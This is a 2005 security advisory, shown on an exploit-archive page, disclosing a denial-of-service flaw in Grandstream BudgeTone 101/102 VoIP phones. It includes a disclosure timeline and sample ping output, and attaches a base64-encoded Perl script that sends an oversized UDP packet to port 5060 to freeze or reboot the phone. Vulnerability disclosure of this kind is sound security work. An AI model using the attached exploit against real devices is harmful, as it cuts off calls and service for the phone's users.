Grandstream.txt

Grandstream.txt: Posted Aug 13, 2005; Authored by Pierre Kroma; It is possible to denial of service the Grandstream Budge Tone 101/102 VOIP phone by sending a UDP packet greater than 65534 bytes to port 5060.; tags | advisory, denial of service, udp; MD5 | 5cd63a48fdb2a6c1b502bd81d50a7d53; Download | Favorite | Comments (0)

Grandstream.txt

--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

- -------------------------------------------------------------------
SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability
- -------------------------------------------------------------------

Problem discovered:     July   20th 2005
Vendor contacted:     July   21th 2005
Advisory will published on:   August   12th 2005

AUTHOR:   Pierre Kroma (kroma@syss.de)
    SySS GmbH
    72070 Tuebingen / Germany
    Tel.: +49-7071-407856-0
Key fingerprint =3D 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC

DEVICE:      Grandstream Budge Tone-101
      Grandstream Budge Tone-102
AFFECTED VERSIONS:   perhaps all(?) <=3D 1.0.6.7 (firmware 1.0.6.7 tested)

EXPLOIT:    attached
VENDOR STATUS:     informed
SEVERITY:     medium
Remotely exploitable:   yes

DESCRIPTION:
It is possible to initiate a D.o.S attack against this voip
(hardware-)phone. If you send an UDP packet greater than 65534 bytes=20
to port 5060 the device stops working:

- any active telephone call will be aborted.
- the display will show nothing / display freeze.
- the integrated HTTP-server won't be reachable any more.

To solve the problem, you must switch the phone off and on again.

If you send a packet of exactly 65534 bytes the device may reboot.
Smaller packets have no effect.

############################################################################
EXAMPLE:
Grandstream BT101/BT102 DoS
written by pierre kroma (kroma@syss.de)

ping the remote device xxx.xxx.xxx.xxx
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D1 ttl=3D250 time=3D0.479 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D2 ttl=3D250 time=3D0.406 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D3 ttl=3D250 time=3D0.404 ms

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev =3D 0.404/0.429/0.479/0.042 ms

Wait ...

ping the remote device xxx.xxx.xxx.xxx again
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms
############################################################################

--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL
Content-Type: application/x-perl; name=grandstream-DoS.pl
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=grandstream-DoS.pl

IyEvdXNyL2Jpbi9wZXJsCiMKdXNlIElPOjpTb2NrZXQ7CnVzZSBUZXJtOjpBTlNJQ29sb3I7Cgoj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIFUgUyBBIEcgRSAjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIwpzeXN0ZW0gKCJjbGVhciIpOwpwcmludCAiXG5HcmFuZHN0cmVhbSBC
VDEwMS9CVDEwMiBEb1NcbiI7CnByaW50ICJ3cml0dGVuIGJ5IHBpZXJyZSBrcm9tYSAoa3JvbWFc
QHN5c3MuZGUpXG5cbiI7CgppZiAoISRBUkdWWzJdKXsKcHJpbnQgcXF+ClVzYWdlOiBwZXJsIGdy
YW5kc3RyZWFtLURvUy5wbCAtcyA8aXAtYWRkcj4gPHVkcC1wb3J0PiB7LXIvLXN9CgoJPGlwLWFk
ZHI+ICA9IDstKQoJPHVkcC1wb3J0PiA9IDUwNjAKCgktciA9ICdyZWJvb3QnIAl0aGUgR3JhbmRz
dHJlYW0gQlQgMTAxLzEwMgoJLXMgPSAnc2h1dGRvd24nIHRoZSBHcmFuZHN0cmVhbSBCVCAxMDEv
MTAyCgp+OyBleGl0O30KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBEIEUgRiBJ
IE4gSSBUIEkgTyBOIFMjIyMjIyMjIyMjIyMjIyMjIyMjIwoKJHZpY3RpbSA9ICRBUkdWWzBdOwok
cG9ydCA9ICRBUkdWWzFdOwokb3B0aW9uID0gJEFSR1ZbMl07CgppZiAoICRvcHRpb24gPT0gJ3In
IHx8ICRvcHRpb24gPT0gJ1InICkKewkkcmVxdWVzdD0gJ2sneDY1NTM0O30KCmlmICggJG9wdGlv
biA9PSAncycgfHwgJG9wdGlvbiA9PSAnUycgKQp7CSRyZXF1ZXN0PSAncCd4NjU1MzU7fQplbHNl
CnsJcHJpbnQgIldyb25nIHBhcmFtZXRlciAtIHRyeSBpdCBhZ2FpbiI7CglleGl0Owp9CgoKIyBw
aW5nIHRoZSByZW1vdGUgZGV2aWNlCnByaW50IGNvbG9yICdib2xkIGJsdWUnOwpwcmludCAiXG5w
aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW1cbiI7CnByaW50IGNvbG9yICdyZXNldCc7CnN5
c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCnByaW50IGNvbG9yICdib2xkIHJlZCc7CnByaW50
ICJcbiBXYWl0IC4uLiBcblxuXG4iOwpwcmludCBjb2xvciAncmVzZXQnOwokc294ID0gSU86OlNv
Y2tldDo6SU5FVC0+bmV3KFByb3RvPT4idWRwIixQZWVyUG9ydD0+IiRwb3J0IixQZWVyQWRkcj0+
IiR2aWN0aW0iKTsKCnByaW50ICRzb3ggJHJlcXVlc3Q7CnNsZWVwIDE7CmNsb3NlICRzb3g7Cgoj
IHBpbmcgdGhlIHJlbW90ZSBkZXZpY2UKcHJpbnQgY29sb3IgJ2JvbGQgYmx1ZSc7CnByaW50ICJw
aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW0gYWdhaW5cbiI7CnByaW50IGNvbG9yICdyZXNl
dCc7CnN5c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCg==

--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL--

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
HP 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

Grandstream.txt

Grandstream.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Grandstream.txt

Share This

Grandstream.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems